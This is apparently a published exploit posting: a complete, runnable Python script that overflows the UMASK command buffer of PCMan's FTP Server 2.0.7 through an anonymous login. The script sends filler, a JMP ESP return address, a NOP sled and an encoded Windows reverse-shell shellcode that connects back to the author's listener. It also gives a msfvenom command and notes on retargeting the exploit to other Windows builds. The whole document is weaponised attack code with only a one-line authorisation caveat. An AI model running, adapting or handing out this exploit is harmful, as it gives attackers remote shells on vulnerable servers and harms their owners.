PCMan FTP Server 2.0.7 UMASK Buffer Overflow
Posted on 02 November 2016
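#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: PCMan's FTP Server 2.0.7 UMASK Command Buffer Overflow Exploit
# Date: 1/11/2016
# Exploit Author: Eagleblack
# Tested on: Windows XP Profesional SP3 Spanish version x86
# CVE : N/A
#
# Stack-based buffer overflow in the UMASK command handler of PCMan's FTP
# Server 2.0.7.  The saved return address lies 2006 bytes into the command
# argument; it is overwritten with the address of a JMP ESP gadget so that
# execution lands on the NOP sled and payload that follow it on the stack.
#
# Review notes (security):
#   * RET below was taken from USER32.dll on the Spanish Windows XP SP3 x86
#     build the author tested on.  DLL base addresses differ between Windows
#     versions, service packs and language builds, so this value has to be
#     re-located (e.g. a "jmp esp" search with mona.py) for any other target;
#     a wrong address simply crashes the service.
#   * SHELLCODE is a windows/shell_reverse_tcp payload with the author's
#     LHOST/LPORT baked in.  Regenerate it for your own listener with the
#     msfvenom command given above SHELLCODE.  The excluded bad characters
#     are \x00 (C string terminator) and \x0a/\x0d (FTP line delimiters),
#     none of which may appear anywhere in the sent buffer.
#   * The server accepts the anonymous user with an empty password, which is
#     why no credentials are needed to reach the vulnerable command.
#   * Only run this against systems you are authorised to test; the payload
#     hands a remote shell to whoever owns the listener it connects back to.
#
# This reconstruction is written to run under both Python 2 and Python 3
# (bytes literals, parenthesised print, socket.create_connection).
import socket
import sys

# Target defaults from the original PoC.  Both can be overridden on the
# command line:  python exploit.py <target-ip> [port]
TARGET_HOST = '192.168.1.13'
TARGET_PORT = 21

# Seconds to wait on connect()/recv(); the original blocked indefinitely if
# the server never answered.
TIMEOUT = 10

# Offset at which the saved return address (EIP) is overwritten.
EIP_OFFSET = 2006

# Length of the NOP (0x90) sled placed between RET and the shellcode.
NOP_SLED_LEN = 30

# 0x7e3db310, little-endian: JMP ESP gadget in USER32.dll
# (Windows XP SP3 Spanish, x86).  Target-specific -- see review notes.
RET = b"\x10\xb3\x3d\x7e"

# Metasploit shellcode (351 bytes, shikata_ga_nai encoded), generated with:
#   msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<port> \
#       -b '\x00\x0a\x0d' -f c
SHELLCODE = (
    b"\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
    b"\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c"
    b"\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c"
    b"\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81"
    b"\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d"
    b"\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c"
    b"\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1"
    b"\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40"
    b"\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66"
    b"\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72"
    b"\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec"
    b"\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b"
    b"\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c"
    b"\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c"
    b"\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f"
    b"\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01"
    b"\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03"
    b"\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff"
    b"\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e"
    b"\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e"
    b"\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8"
    b"\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f"
    b"\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6"
    b"\x33\x93\xbd\x45\x33\xb6"
)


def build_payload(shellcode=SHELLCODE, ret=RET, offset=EIP_OFFSET,
                  nops=NOP_SLED_LEN):
    """Return the UMASK argument: filler, return address, NOP sled, shellcode.

    `offset` bytes of 'A' (0x41) reach the saved return address, `ret` is
    written over it, then `nops` bytes of 0x90 give the JMP ESP a forgiving
    landing zone in front of `shellcode`.  The defaults reproduce the
    original PoC buffer byte for byte (2006 + 4 + 30 + 351 = 2391 bytes).
    """
    return b"\x41" * offset + ret + b"\x90" * nops + shellcode


def send_exploit(host, port, payload):
    """Log in anonymously and send the oversized UMASK command to host:port.

    FTP commands are CRLF-terminated as RFC 959 requires (the server would
    otherwise never answer the USER/PASS exchange).  The command word is sent
    directly followed by the payload, exactly as in the original PoC; the
    2006-byte offset was measured with that prefix, so inserting a space
    after "UMASK" would shift the return-address position by one.

    Raises socket.error (incl. socket.timeout) on network failure.  The
    socket is closed on every exit path.
    """
    sock = socket.create_connection((host, port), TIMEOUT)
    try:
        sock.recv(1024)                              # FTP banner
        sock.sendall(b"USER anonymous\r\n")          # anonymous user
        sock.recv(1024)
        sock.sendall(b"PASS \r\n")                   # empty (null) password
        sock.recv(1024)
        sock.sendall(b"UMASK" + payload + b"\r\n")   # overflowing command
    finally:
        sock.close()


def main(argv=None):
    """Entry point: optional [host [port]] arguments, then fire the exploit."""
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if args else TARGET_HOST
    port = int(args[1]) if len(args) > 1 else TARGET_PORT
    payload = build_payload()
    print("Sending Buffer")
    send_exploit(host, port, payload)


if __name__ == "__main__":
    main()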